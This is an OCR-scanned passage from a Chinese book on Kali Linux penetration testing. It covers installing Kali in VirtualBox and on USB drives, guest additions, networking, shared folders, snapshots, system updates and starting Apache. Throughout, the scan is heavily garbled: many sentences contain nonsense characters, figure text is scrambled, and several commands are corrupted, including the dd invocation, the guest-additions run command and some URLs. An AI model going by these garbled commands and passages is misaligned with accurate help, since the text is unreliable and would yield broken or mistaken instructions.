7. 在 Storage Tree 里 选择 IDE Controller-Attributes ， 然 后 选中 Kali 
Linux 的 ISO 镜像 文件 。 本 例 中 ， 个 文件 应 该 是 kali-linux-1.0.1- 
i386.iso。 如 有 果 设 置 成 功 ， SEDI DN IDE 字 段 中 看 到 这 个 镜像 
UOCE ( 见 图 1.11) ° 


图 General 
E System 
Display 


Kali Linux 


| i 
|S Storage ux-1.0.1-B86... F 加 Choose a virtual CD/DVD disk file. 
È Audio @ Controller: SATA kali-linux-1.0.1-i386.iso 

& Network @ Kal unux.vdi 


@ Remove disk from virtual drive 
fj Serial Ports Location: 0:\software\so\kalHinux-1.0.1-386.50 
i USB Attached To: — 


图 1.11 
只 要 局 就 可 以 从 ISO 镜像 启动 并 安装 Kali Linux。 接 
Bm 参见 前 文 的 “安装 在 物理 主机 上 ”的 相关 内 容 。 
ee VM 镜像 安装 Kali Linux 


我 们 同样 可 以 使 用 官方 提供 的 VMware 磁盘 镜像 ， 直 接 安装 Kali 
Linux ° 

在 Kali Linux 团队 提供 的 VMware A23 tei P, X38 HH T i386 平台 的 
Kali Linux 镜像 只 有 GNOME GUI 版本。 

这 种 安装 方法 相当 简单 。 

在 下 载 Kali Linux VMware 人 硬盘 镜像 文件 ( kali-linux-1.0-1386- 
gnomevm.tar.gz) 之 后 ， 您 需要 验证 下 载 文 件 的 SHA1 哈 希 值 是 否 与 网 
站 公布 的 值 一 致 。 只 有 在 它们 相同 的 情况 下 ， 您 才能 从 文件 中 解压 缩 
出 正确 的 镜像 文件 。 

官方 提供 的 VMware 镜 像 文 件 是 GZ 格式 的 压缩 文件 。 如 果 您 使 用 
的 是 Windows 系 统 ， 您 就 需要 gzip 或 7-Zip 这 类 工具 将 其 解压 缩 。 这 个 
GZ 格式 的 压缩 包 包 含 21 个 文件 。 在 解压 缩 之 后 ， 您 将 看 到 21 个 文件 

( 见 图 1.12) 。 

在 VirtualBox 的 工具 栏 中 ， 选 择 New 新 建 VM 虚 拟 机 。 接 下 来 在 程 
序 的 向 导 窗 口中 进行 如 下 设置 ， 使 这 个 VM 加 载 刚 才 解压 出 来 的 虚拟 机 
镜像 文件 。 

1. 我 们 设置 虚拟 机 名 称 为 kali-gnome-vm-32， 并 设置 操作 系统 大 
Linux — Debian ° 

2. 分 配 2048MB 内 存 给 Kali Linux 虚拟 机 。 

3. 设置 虚拟 机 硬盘 类 型 为 Use an existing virtual hard drive file, 9^ 
后 指定 其 硬盘 使 用 镜像 文件 kali — linux - i386-gnome-vm.vmdk。 接 下 
来 ， 点 击 Create 创 建 虚 拟 机 ， 如 图 1.13 所 示 。 


| 1 kali-linux-i386-gnome-vm nvram 8.684 11/03/2013 23:25 -a— 
kali-linux-1386-gnome-vm vmdk 1.358 11/03/2013 23:19 -a— 
_ kali-linux-i386-gnome-vm vmsd 0 09/03/2013 02-59 -a— 
5 kali-linux-i386-gnome-vm vmx 2.736 11/03/2013 23:25 -a— 
|Ì kali-linux-1386-gnome-vm vmxf 382 09/03/2013 03:26 -a— 
kali-linux-1386-gnome-vm-s00 1 vmdk 1.936.130.048 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-s002 vmdk 953.548.800 11/03/2013 23:36 -a— 
kali-linux-i386-gnome-vm-s003 vmdk 100.007.936 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-s004 vmdk 1.101.004.800 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-s005 vmdk 586.285.056 11/03/2013 23:36 -a— 
kali-linux-i386-gnome-vm-s006 vmdk 337.772.544 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-5007 vmdk 830.144.512 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-s5008 vmdk 565.968.896 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vrn-s009 vmdk 390.529.024 11/03/2013 23:36 -a— 
kali-linux-i386-gnome-vm-s010 vmdk 299.565.056 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vrn-s01 1 vmdk 196.411.392 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-s0 12 vmdk 364.773.376 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-s0 13 vmdk 203.292.672 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-s0 14 vmdk 294.191.104 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-s015 vmdk 1.441.792 11/03/2013 23:36 -a— 
kali-linux-1386-gnome-vm-50 16 vmdk 65.536 11/03/2013 23:36 -a— 


图 1.12 


Hard drive 


If you wish you can add a virtual hard drive to the new machine. You can 
ether create a new hard drive file or select one from the ist or from another 


location using the folder icon. 


If you need a more complex storage set-up you can skip this step and make 
the changes to the machine settings once the machine is created. 


The recommended size of the hard drive is 8,00 GB. 
© Do not add a virtual hard drive 

© Greate a virtual hard drive now 

© Use an existing virtual hard drive file 


jabuxdüégnomewmwmdk(Noma 30,0068) -| 加 


El 1.13 
使 用 硬盘 镜像 方式 安装 Kali Linux 之 后 ， 系 统 的 默认 设置 值 如 下 所 


e 人 硬盘 容量 : 30GB° 

e 联网 方式 : NAT ° 

e 用 户 名 : root? 

e 密码 : toor° 

如 果 要 把 Kali 当 做 渗透 测试 平台 使 用 ， 应 当 人 避免 以 NAT 方式 接 入 
网 络 。 本 文 推荐 您 以 桥接 (bridged) 方式 联网 。 

在 配置 Kali VM 的 时 候 ， 应 当 尽快 更 改 默 认 密码 。 


= 


如 果 操 作成 功 ， 虚 拟 机 管理 列表 应 能 列 出 刚才 新 建 的 虚拟 机 
图 1.14) » 


T Kaa (Testing 
O ere ow 
m Viceo Memory. 12 M8 
Remote Desktop Server; Osabied 


> [CD/OvO] roty 
iakinux-Q96-gnome vm. vemdk (Normal, 20,00 G8) 


Adapter 1: Hotel PRO/1000 MT Destop (NAT) 
2 vsa 

Deve fter 0 (0 actwe) 

al Shared folders 

None 


图 1.14 

在 虚拟 机 菜单 条 中 点 击 Start 图 标 ， 即 可 运行 Kali Linux 虚拟 机 。 完 
成 启动 过 程 之 后 ， Kali Linux 应 当 会 进入 登录 界面 。 

如 果 您 遇 到 了 图 1.15 所 示 的 问题 ， 那 么 就 需要 安装 VirtualBox 
Extension Pack (功能 增强 £& ) 。 您 可 在 
http;//www.virtualbox.org/wiki/Downloads FERAN LH. 9 

请 注意 ， 您 应 当下 载 版 本 号 和 VirtualBox 完 全 相同 的 功能 增强 包 。 
也 束 是 说 ， 如 采 您 使 用 的 是 4.3.0 版 的 VirtualBox， 就 应 当下 载 4.3.0 版 的 
Extension Pack ° 

在 VirtualBox 管 理 程序 安装 功能 增强 包 的 步 又 如 下 。 

1. 通过 有 末 单 File | Preferences， 进 入 Settings 设置 界面 。 随 后 ， 选 
择 左 侧 的 Extensions ( 见 图 1.16) ° 


e Mio ena sal for Whe oni andio Jn quise: 
vm-32. 


Implementation of the USB 2.0 controller not found! 
Because the USB 2.0 controller state is part of the saved VM 


USB 2.0 support in the VM settings (VERR NOT FOUND). 


Resuk Code: E FAIL (0x80004005) 
Component: Console 
Interface: IConsole (db7ab4ca-2a3f-4183-9243-c12084d292392) 


Lox J( ew | 


图 1.15 


BB General || 
©] Input 

e Update 

Q Language 
Display 

WP Network 
le Extensions | 
Proxy 


| Select a settings category from the ist on the left-hand side 
and move the mouse over a settings tem to get more 


[o J( exe j| we jJ 


图 1.16 
2. 点 击 Add package 按 钮 ， 选 中 刚才 下 载 的 VirtualBox Extension 
Pack。 这 时 ，VirtualBox 会 在 弹出 窗口 里 列 出 扩展 功能 包 的 信息 ， 并 请 
您 确认 是 否 继续 安装 〈 见 图 1.17) 。 
3. 选择 Install 按 照 屏 幕 上 的 提示 安装 扩展 功能 包 。 如 果 安 装 过 程 
顺利 ， 您 将 在 Extension 列 表 里 看 到 扩展 功能 包 的 相关 信息 (AL 
1.18) 。 


Description: USB 2.0 Host Controller, VirtualBox 
RDP, ROM wth E1000 support. 


图 1.17 


Orade VM VirtualBox Extension Pack 4.2.10r84104| @ 


图 1.18 
4. 现在 ， 您 可 以 使 用 默认 的 用 户 名 和 密码 登录 Kali Linux 。 
1.4.3 安装 在 USB 闪 存 上 


安装 Kali Linux 的 第 三 种 方法 ， 就 是 把 它 安 装 到 USB 闪存 里 。 通 
常 ， 人 们 把 安装 在 闪存 上 的 Kali Linux 叫做 portable (便携 ) Kali 
Linux。 按 照 Kali 官 方 文件 的 说 法 ， 这 种 安装 方式 的 启动 和 安装 速度 最 


R, AÉKalifff A A DREN ACRI 3 * FALL TERE LAUR, RHEES 
台 机 器 上 启动 Kali 系统 而 言 ， 装 有 Kali Linux 的 闪存 盘 可 以 在 所 有 文 持 
USB 启动 的 主机 上 使 用 Kali 系 统 。 

这 种 安装 方法 同样 适合 在 内 存 卡 (SSD、SDHC、SDXC 等 ) 上 安 
Kali Linux ° 

很 多 工具 都 可 以 制作 portable Kali Linux » $}, Rufus (http:// 
rufus.akeo.ie) 就 不 错 。 这 个 工具 只 能 在 Windows 操 作 系 统 下 运行 。 

其 他 可 从 ISO 镜 像 文件 制作 可 局 动 USB 的 工具 如 下 所 示 : 

e Win32DiskImager (https://launchpad.net/win32-image-writer) ; 

e Universal USB Installer (http:/www.pendrivelinux.com/universal- 
usbinstaller-easy-as-1-2-3/) ; 

e Linux Live USB Creator (http://www.linuxliveusb.com) 。 

在 制作 portable Kali Linux 之 前 ， 您 需要 准备 好 几 样 素材 。 

e Kali Linux 的 ISO 镜像 文件 :虽然 您 可 以 使 用 启动 磁盘 创建 工具 
直接 下 载 镜像 文件 ， 但 是 我 们 仍然 认为 提前 下 载 好 ISO 镜像 文件 ， 再 用 
Rufus 使 用 镜像 文件 比较 稳妥 。 

e USB NFR: 您 需要 一 个 容量 足够 大 的 USB AVETE © FUE 
您 使 用 16GB 以 上 的 内 存盘 。 

在 下 载 Rufus 之 后 ， 在 Windows 里 双击 rufus.exe 文 件 就 可 以 运行 它 。 
它 会 显示 出 程序 界面 。 

如 果 您 使 用 的 是 基于 UNIX 的 操作 系统 ， 您 可 以 直接 使 用 dd 指令 创 
建 可 局 动 内 存盘。 例如 : 

dd if-kali-linux-1.0.1-1386.iso of=/dev/sdb bs-512k 

此 处 的 /devwsdb 应 当 是 您 USB 内 存 强 的 设备 名 称 。 

使 用 Rufus 创建 可 启动 的 Kali USB. 闪存 盘 的 设置 如 下 (LEA 
1.19) 


e Device: 选择 USB IN 5K a as » API, Exe Windows 系统 的 E 
o 

e Partition scheme and target system type: 设置 为 MBR partition 
scheme for BIOS or UEFI computers ° 

e Create a bootable disk using: ix &7JISO Image 并 使 用 右 侧 磁盘 图 
标 选 取 ISO 镜像 文件 。 

然后 点 击 Start 创 建 可 启动 内 存盘 〈 见 图 1.20) 。 

在 完成 这 些 步骤 之 后 ， 如 有 果 您 想 要 立即 测试 USB 内 存盘 ， 则 应 在 
保存 好 所 有 文件 的 情况 下 重启 计算 机 。 您 可 能 需要 配置 计算 机 的 
BIOS， 使 其 从 USB 磁盘 局 动 计算 机 。 如 果 没 有 问题 的 话 ， 您 应 该 可 以 
通过 USB 内 存盘 启动 Kali Linux 系统 。 

在 USB 闪 存盘 上 安装 系统 之 后 ， 如 果 您 想 要 让 系统 能 够 保存 您 所 
更 改 的 文件 ( 即 persistence capabilities) ， 您 可 参照 Kali 官 方 文档 进行 
设置 。 请 参见 Adding Persistence to Your Kali Live USB， 地 址 为 


http://docs. kali.org/installation/kali-linux-live-usb-install ° 


Kali Live 
Format Options GZ) 


© check device for bad blocks: (2Passes v] 
(V! Quick format 


[F] Create a bootable disk using: 


F) Greate extended label and icon files 


i 


Using ISO: kali-linux-1.0.1-i386.so 


图 1.19 


E:\lve\filesystem.squashfs (1.9 GB) 


图 1.20 
1.5 配置 虚拟 机 


在 登录 Kali Linux 虚拟 机 之 后 ， 需 要 进行 儿 项 配置 。 对 执行 渗透 测 
试 来 说 ， 这 几 项 配置 相当 重要 。 


1.5.1 安 : I 


f£ VirtualBox 里 配置 好 Kali Linux 所 用 的 虚拟 机 之 后 ， 我 们 建议 您 
安装 客户 端 功能 增强 包 (VirtualBox guest additions) 。 这 个 功能 增强 包 
的 作用 有 很 多 。 

e 它 文 持 以 全 屏 模 式 查 看 虚拟 机 的 加 面 。 

e 它 显 著 改善 鼠标 操作 方面 的 用 户 体 验 。 

e 它 文 持 物理 主机 到 虚拟 主机 之 间 的 文本 复制 功能 。 

e 它 文 持 物 理 主机 和 虚拟 主机 之 间 的 文件 夹 共 享 。 

安 效 客 户 端 功能 增强 包 的 具体 步骤 如 下 。 

1， 在 VirtualBox 的 荣 单 里 ， 选 择 Devices | Install Guest Additions ° 
此 后 ， 被 虚拟 机 会 以 光盘 的 形式 加 载 VirutualBox guest additions ( 见 图 
1.21) » 


Fe Kali Linux [Running] - Oracle VN Virtual l^ 


Machine View [ Devices | Hep 一 


CD/DVD Devices 
USB Devices 
Shared Clipboard 


Drag'n'Drop 

Network Adapters... 
Shared Folders... 
Enable Remote Display 


Install Guest Additions... Host+D 


图 1.21 
2. 在 图 1.22 所 示 的 Virutalbox 窗 口 里 ， 点 击 Cancel 。 


This medium contains software intended to be automatically 
started. Would you like to run it? 


The software will run directly from the medium 
"VBOXADDITIONS.4.2.10.84104". You should never run software that you don't 
trust 


If in doubt, press Cancel 


图 1.22 
3. 打开 终端 程序 terminal ， 进 入 VirtualBox guest additions 所 在 的 
CDROM 目 录 。 一 般 情 况 下 ， 这 个 目录 的 路 径 是 /media/cdrom0 ( 见 图 


:~ /media/cdrom0/ 
-/media/cdrom0# ls 


VBoxSolarisAdditions. pkg 

0S2 VBoxWindowsAdditions-amd64, exe 
AUTORUN. INF runasroot.sh VBoxWindowsAdditions. exe 
autorun, sh VBoxLinuxAdditions.run VBoxWindowsAdditions-x86. exe 


: /media/cdromO# 


图 1.23 
4. 执行 VBoxLinuxAdditions.run， 以 启动 它 的 安装 程序 。 
sh./V BoxLinuxAdditions.run 
5. 等 待 数 分 钟 之 后 ， 安 装 程序 会 编译 并 安装 好 客户 端 功能 增强 包 
的 各 种 模块 ( 见 图 1.24) e 


图 1.24 
6. Xt ArootH]3E Bx ° 
7. 7£ VirtualBox BJ 3E E, f FAA $8 r3 d: V BoxAdditions 的 CD 镜 
像 文件 ， 然 后 选中 Eject， 弹 出 这 个 虚拟 光驱 。 如 果 操 作成 功 ， 
VBoxAdditions 的 光盘 图 标 将 从 虚拟 机 的 桌面 上 消失 。 


8. 在 终端 窗口 里 使 用 reboot 指 令 重 新 启动 虚拟 机 。 
9. 待 重启 之 后 ， 您 可 以 在 菜单 栏 选 择 View | Switch to fullscreenzt 
入 全 屏 模式 。 


ASTI RESTATE Kali Linux 里 设置 有 线 网 络 和 无 线 网 络 的 方法 。 

1. 配置 有 线 网 络 

无 论 是 通过 VMware 磁 僵 镜像 还 是 通过 ISO 镜像 女友 Kali Linux， 默 
认 情 况 下 Kali Linux 接 入 网 络 的 方式 都 是 NAT (网 络 地 址 转换 ) 。 在 
NAT 方 式 下 ，Kali Linux 的 虚拟 机 可 以 通过 物理 主机 联 入 外 部 网 络 ， 而 
外 部 网 络 甚至 是 物理 主机 上 自身 都 无 法 直接 访问 安装 有 Kali Linux 的 虚拟 
机 。 

进行 实地 的 渗透 测试 时 ， 您 可 能 需要 把 网 络 结构 变更 为 Bridged 
Adapter。 上 有 具 体 的 设置 步骤 如 下 。 

1. 首先 请 确定 您 已 经 关闭 (power off) 虚拟 机 。 

2. 在 VirtualBox 管理 程序 里 ， 选 中 相应 的 虚拟 机 ， 即 安装 Kali 
Linux 的 虚拟 机 ， 然 后 点 击 窗口 右 侧 的 Network， 通 过 下 拉 选 项 把 
Attached to 从 NAT 变更 为 Bridged Adapter (桥接 适配器 ) 。 如 图 1.25 
所 示 ， 其 中 的 Name 选 项 可 设置 为 您 需要 测试 的 网 卡 接口 。 


-< 
inc 


Network 


Adapter] | Adapter | Adapter3 | Adapter | 


F) Enable Network Adapter 
Attached to: [Bridged Adapter = | 
Name: [InteKR) 82579LM Gigabit Network Connection 


图 1.25 


如 需 使 用 桥接 连接 ， 首 先 要 使 物理 主机 与 网 络 设备 连接 ， 例 如 路 
由 器 或 交换 机 。 同 时 ， 接 入 的 网 络 里 应 当 有 DHCP 服 务 ， 以 分 配 IP 地 址 
给 虚拟 机 。 

您 可 能 已 经 注意 到 了 ， 通 过 DHCP 获 取 的 IP 地 址 并 不 是 固定 的 IP 地 
址 ， 这 种 IP 地 址 在 一 定时 间 后 可 能 会 发 生变 化 。 如 果 Kali Linux 通过 
DHCP 获取 IP 地 址 ， 在 超过 固定 周期 (DHCP 的 租赁 时 间 ) 之 后 ， 
DHCP 会 重新 给 虚拟 机 分 配 一 次 IP 地 址 。 重 新 分 配 的 IP 地 址 可 能 和 上 次 
分 配 的 卫 地 址 相同 ， 也 可 能 不 同 。 

如 果 虚 拟 机 需要 使 用 固定 的 IP 地 址 ， 应 该 修改 虚拟 机 的 网 络 设置 
X ft-Jetc/network/interfaces ° 

默认 情况 下 ，Kali Linux 的 网 络 设置 文件 如 下 。 


auto lo 


iface lo inet loopback 

这 个 配置 文件 指定 所 有 网 卡 都 通过 DHCP 获 取 IP 地 址 。 如 需 为 虚拟 
机 绑 定 固定 IP 地 址 ， 就 不 得 不 对 这 个 文件 进行 相应 修改 。 

auto eth0 

iface ethO inet static 

address 10.0.2.15 

netmask 255.255.255.0 

network 10.0.2.0 

broadcast 10.0.2.255 

gateway 10.0.2.2 

上 壕 文件 令 第 一 个 有 线 网 卡 eth0 HET IP 地址 10.0.2.15。 您 可 能 
需要 根据 实际 情况 修改 上 述 设 置 。 

2. 配置 无 线 网 络 

在 虚拟 机 里 安装 的 Kali Linux 无 法 使 用 笔记 本 上 集成 的 无 线 网 卡 。 
好 在 您 可 以 使 用 USB 接 口 的 无 线 网 卡 。 


在 Kali 虚 拟 机 上 使 用 USB 接 口 的 无 线 网 卡 时 ， 要 把 USB 无 线 网 卡 插 
在 主机 USB 接 口上 ， 在 VirtualBox 的 菜单 里 选 Devices | USB Devices, 
再 选中 所 要 使 用 的 USB 无 线 网 卡 。 

如 图 1.26 所 示 ， zn 选择 了 Realtek 心 片 的 USB 无 线 网 卡 。 


CD/DVD Devices Sat Apr 20, 10:10 PM 
USB Devices Logitech USB Receiver [2201] 
Shared Clipboard Chicony Electronics Co. Ltd. Integrated Camera [0854] 


Shared Folders... 


=} Drag'nDrop Manufacturer Realtek RTL8187. RTL8187 Wireless [0100] 
«P Network Adapters... endor ID: OBDA 02] 
FEN Product ID: 8187 


Ls) i 
Enatke Remote Dispiny Serial No. OOCOCAS2A418 


图 1.26 
如 采 您 的 无 线 网 卡 可 以 被 Kali 识 别 ， 可 以 在 dmesg 指 令 的 输出 中 看 
到 无 线 网 卡 的 硬件 信息 。 
在 Kali 桌面 的 右上 和 角 可 以 找到 Network Connection (网 络 连 接 ) 的 
图 标 。 点 击 这 个 图 标 后 ， 将 能 看 到 网 络 信息 。 
此 时 可 以 看 到 您 的 机 器 可 用 的 有 线 网 络 和 无 线 网 络 的 名 称 ( 见 图 
1.27) 。 
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[1.27 
要 想 连 接 无 线 网 络 ， 束 要 双击 该 网 络 的 SSID。 如 果 选 定 的 网 络 要 
求 您 进行 身份 验证 ， 程 序 会 提示 您 输入 密码 。 在 输入 正确 的 无 线 网 络 
密码 后 ， 您 就 被 授权 使 用 该 无 线 网 络 。 


3. 局 用 网 络 

我 们 通过 service 指 令 来 局 动 和 关闭 网 络 。 

如 需 局 用 网 络 ， 可 以 使 用 下 述 指 令 : 

service networking start 

如 需 关 闭 网 络 ， 可 以 使 用 下 述 指 令 : 

service networking stop 

您 需要 有 root 权 限 才能 运行 上 述 两 条 指令 。 

接 下 来 ， 您 可 以 通过 ARP ping 请 求 (arping 指令 ) 连接 同 网 段 的 
其 他 主机 ， 来 测试 网 络 配 置 症 否 正确 。 

默认 情况 下 ， 您 需要 在 计算 机 每 次 重 局 后 手动 启动 网 络 连接 服 
务 。 您 可 通过 下 述 指 令 ， 让 (虚拟 ) 计算 机 在 每 次 启动 的 时 候 都 自动 
局 动 网 络 连接 服务 : 

update-rc.d networking defaults 

上 述 指令 会 在 /etc/rc*.d 目 孙 里 创建 必要 的 连接 ， 以 在 Kali 启 动 的 时 
候 目 动 执行 网 络 配置 的 脚本 程序 。 


1.5.3 文件 夹 共享 


在 进行 渗透 测试 的 工作 时 ， 我 们 经 常 需要 在 物理 主机 和 虚拟 机 之 
间 交 换文 件 ， 例 如 把 渗透 测试 的 文档 复制 到 物理 主机 上 。VirtualBox 的 
文件 夹 共享 (Shared Folders) 功能 可 以 满足 这 一 需求 。 

您 要 先 关 闭 虚 拟 机 ， 再 在 VirtualBox 里 配置 文件 夹 共享 。 关 闭 虚 
拟 机 之 后 ， 选 中 相应 的 虚拟 机 名 称 (右键 点 击 Settings) ， 然 后 在 窗口 
EMA HE AE Shared Folders， 如 图 1.28 所 示 。 

点 击 右 侧 的 加 号 “+? 图 标 ， 即 可 添加 要 物理 主机 共享 给 虚拟 机 的 文 
件 夹 。 在 此 之 后 ， Folder Path 里 会 显示 共享 文件 夹 的 信息 。 


Name Path 


Machine Folders 


Q9 Serial Ports 
Ø USB 
Shared Folders 


Select a settings category from the Ist on the left-hand side and move the mouse over 
a settings item to get more information. | 
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图 1.28 
您 还 可 以 调整 Folder Name 选 项 ， 设 置 共 享 文件 夹 的 共享 名 称 。 
后 ， 虚 拟 机 (Guest OS) 就 可 以 通过 这 个 共享 名 称 PNE) 
来 o 
如 果 不 硕 望 虚拟 机 更 改 共 享 文件 夹 的 内 容 ， 可 设置 Read-only 选 项 
设置 ， 把 该 文件 夹 设 置 为 只 读 。 如 果 选 中 Auto-mount 选 项 ， 虚 拟 机 在 
每 次 启动 后 都 会 连接 这 个 文件 来 。 这 些 设置 如 图 1.29 所 示 。 


Folder Path: 1. D:\software 


Folder Name: software 
(V! Read-only 


(V) Auto-mount 


( ox || ewe | 


”图 1.29 
在 图 1.29 所 示 的 设置 里 ， 我 们 共享 了 主机 上 的 Di\software 文 件 夹 给 
虚拟 机 ， 并 且 设 置 其 文件 夹 权 限 为 只 读 。 
虚拟 机 可 以 通过 目录 /media/sf_software 目 录 访 问 物 理 主机 共享 的 文 
件 夹 。 


一 旦 您 把 虚拟 机 配置 到 理想 的 可 工作 状态 ， 我 们 建议 您 立刻 对 虚 
拟 机 进行 快照 备份 。 万 一 日 后 出 现 配置 故障 ， 可 利用 快照 备份 把 虚拟 
机 迅速 恢复 到 正常 工作 状态 。 

VirtualBoxti 提供 了 方便 的 快照 备份 功能 。 您 可 通过 菜单 Machine- 
Take Snapshot 进行 快照 备份 ( 见 图 1.30) 。 只 有 在 启动 虚拟 机 的 情况 下 
才能 进行 快照 。 
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图 1.30 
Snapshot Name 就 是 您 给 此 次 备份 起 的 名 字 ， 我 们 建议 您 在 里 面 标 
注 上 备份 日 期 。 您 还 可 以 在 Snapshot Description 里 对 此 次 备份 进行 详细 
备注 。 填 写 完全 部 信息 并 点 击 OK 后 ， VirtualBox 就 开始 进行 备份 。 备 
份 时 间 的 长 短 取决 于 保存 信息 的 信息 量 大 小 。 


1.5.5 y 


人 们 时 常 需要 以 文件 形式 备份 虚拟 机 ， 或 通过 这 种 方法 把 虚拟 机 
分 吝 给 他 人 使 用 。VirtualBox 的 虚拟 机 导出 功能 简化 了 这 种 操作 。 在 关 
闭 需 要 导出 的 虚拟 机 之 后 ， 在 菜单 栏 选中 File | Export Appliance 就 可 导 
出 所 选 的 虚拟 机 。 

导出 虚拟 机 的 操作 步骤 如 下 。 

1. 选中 Export Appliance 选项 ， 调 出 Appliance Export Wizard ° 

2. 选择 需要 导出 的 虚拟 机 。 

3. 设置 导出 文件 的 目录 和 文件 名 。 默 认 情 况 下 ， 文 件 将 保存 在 主 
目录 下 ， 文 件 将 保存 为 ova (Open Virtualization Format Archive) 格 


式 。 如 果 您 不 清楚 应 该 以 何 种 格式 保存 这 个 文件 ， 就 应 当 使 用 默认 的 
文件 存储 格式 。 

4. 您 可 以 在 图 1.31 所 示 的 界面 里 设置 虚拟 机 的 各 种 属性 。 如 果 不 
需要 进行 特定 设置 ， 可 以 不 填写 任何 选项 。 
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图 1.31 
5. 点 击 Export 之 后 ，VirtualBox 将 把 虚拟 机 导出 到 文件 。 导 出 时 间 
的 长 短 取决 于 虚拟 机 硬盘 容量 的 大 小 。 它 的 硬盘 文件 越 多 ， 导 出 的 时 
间 也 就 越 长 。 在 我 们 的 测试 环境 下 ， 导 出 Kali Linux 虚拟 机 的 操作 耗 时 
大 约 20 分 钟 。 


1.6 f$ 统 更 新 


Kali Linux 由 操作 系统 内 核 和 数 百 个 软件 构成 。 如 果 和 需要 使 用 软件 
的 最 新 功能 ， 您 就 需要 将 其 更 新 到 最 新 的 版 本 。 

我 们 建议 您 仅 从 Kali Linux 官方 的 软件 仓库 (repository) 进行 更 
新 。 

在 您 安装 和 配置 好 Kali Linux 之 后 ， 束 应 当 立 即 进行 系统 更 新 。 
为 Kali 是 基于 Debian 的 操作 系统 ， 您 需要 使 用 Debian 的 指令 (apt-get) 
进行 系统 更 新 。 

更 新 指令 apt-get 会 查询 /etc/apt/sources.list 文 件 ， 从 中 获取 更 新 服务 
妖 的 信息 。 您 需要 确定 这 个 文件 指定 了 正确 的 升级 服务 器 。 

默认 情况 下 ，Kali Linux 的 sources.list 文件 包含 下 述 信息 。 

# deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot i386 

LIVE/INSTALL Binary 20130315-11:39]/ kali contrib main non-free 

#deb cdrom:[Debian GNU/Linux 7.0 Kali - Official Snapshot i386 
LIVE/ 

INSTALL Binary 20130315-11:39]/ kali contrib main non-free 

deb http://http.kali.org/kali kali main non-free contrib 


deb-src http://http.kali.org/kali kali main non-free contrib 

## Security updates 

deb http://security.kali.org/kali-security kali/updates main contrib non- 
free 

在 进行 系统 更 新 之 前 ， 要 使 主机 上 软件 包 的 索引 信息 
与 /etc/apt/sources.list 上 的 服务 器 进行 同步 。 同 步 索 引 的 指令 是 : 

apt-get update 

TEN Kali 安装 软件 或 安装 系统 更 新 之 前 ， 每 次 都 要 执行 apt-get 


update 指令 。 


竺 同步 软件 包 的 索引 信息 之 后 ， 就 可 以 进行 软件 更 新 。 

系统 更 新 的 指令 有 两 种 。 

e apt-get upgrade: 升级 系统 上 安装 的 所 有 软件 包 。 如 采 在 升级 软 
件 包 时 出 现 什 么 意外 ， 所 涉及 的 软件 包 会 原封 未 动 地 保持 在 更 新 之 前 
的 状态 。 

e apt-get dist-upgrade: 升级 整个 Kali Linux 系 统 。 如 需 从 Kali Linux 
1.0.1 升 级 到 Kali Linux 1.0.2， 束 应 当 使 用 这 条 指令 。 它 不 仅 能 够 升级 所 
有 已 安装 的 软件 包 ， 而 且 会 处 理 升 级 过 程 中 可 能 出 现 的 软件 冲突 。 某 
些 情况 下 ， 它 的 部 分 升级 过 程 需要 人 工 参 与 。 

在 输入 升级 Kali Linux 所 需 的 适当 指令 之 后 ，apt-get 程序 会 详细 列 
出 将 要 安装 、 升 级 或 删除 的 软件 包 信 息 ， 然 后 等 竺 您 的 确认 。 

在 您 进行 确认 之 后 ，apt-get 程 序 将 开始 进行 系统 更 新 。 系 统 更 新 的 
时 间 长 短 ， 主 要 取决 于 市 宽 和 网 速 的 情况 。 


1.7 Kali Linux 的 网 络 服务 


Kali Linux 系统 可 安装 多 种 网 络 服务 。 在 这 一 站 ， 我 们 仅 讨论 其 中 
三 种 服务 的 安装 和 配置 方法 : HITP、MySQL 和 SSH 服务 。 您 可 以 通 
iw 3€ i Kali Linux | System Services， 查 看 可 以 安装 的 其 他 服务 。 


1.7.1 HTTP 


从 事 渗透 测试 的 工作 人 员 ， 可 能 会 经 名 用 到 Web 服 务 器 。 例 如 ， 当 
需要 测试 web 程序 的 恶意 脚本 时 ， 束 需要 自己 搭建 个 web 服务器。 其 实 
Kali Linux 已 经 集成 了 Apache， 只 要 将 之 启动 束 可 以 开始 使 用 了 。 

激活 Kali Linux 的 HTTP 服 务 的 步骤 如 下 。 

1. WR Bw RASA Apache HTTPS, TÉR EA A 
依次 选中 Kali Linux |System Service | HTTPD | apache2 start。 如 果 要 通过 
命令 行 启动 它 ， 可 在 终端 窗口 里 输入 下 述 指令 : 


service apache2 start 

2. 如 果 配 置 文件 没有 问题 ， 系 统 会 返回 下 述 啊 应 信息 。 

[....] Starting web server: apache2 ok 

3. FELLA, fan] DLE FH P s DU SPD IEA SUL PE A 
It works! 的 默认 页 面 ( 见 图 1.32) 。 


Iceweasel uu 


Iceweasel v |: http://localhost/ | se | 
or Oe 3 @ BB» 


It works! 


This is the default web page for this server. 


The web server software is running but no content has been added, yet. 


图 1.32 

停止 Apache HTTP 服务 的 操作 步骤 如 下 。 

1. 如 果 要 通过 桌面 菜单 停止 Apache HTTP 服务 ， 可 在 桌面 菜单 中 
依次 选中 Kali Linux | System Service | HTTPD | apache2 stop。 如 果 要 通 
过 命令 行 停止 它 ， 可 在 终端 窗口 里 输入 下 壕 指 令 : 

service apache2 stop 

2. 系统 会 返回 下 述 啊 应 信息 。 

[....] Stopping web server: apache2 [ ok waiting . 

请 注意 ， 在 计算 机 启动 的 时 候 ， 系 统 并 不 会 自动 局 动 上 述 服务 。 
在 下 次 局 动 Kali Linux 系 统 的 时 候 ， 您 都 需要 再 次 执行 这 个 命令 。 好 在 
我 们 可 以 通过 下 述 指令 ， 指 定 计算 机 在 局 动 时 目 动 局 动 Apache HITP 服 
务 : 

update-rc.d apache2 defaults 

这 条 指令 将 把 apache2 服 务 添加 到 目 动 局 动 的 程序 组 里 。 


1.7.2 MySQL 


下 面 将 要 介绍 MySQL B & © MySQL 属于 标准 的 关系 数据 库 
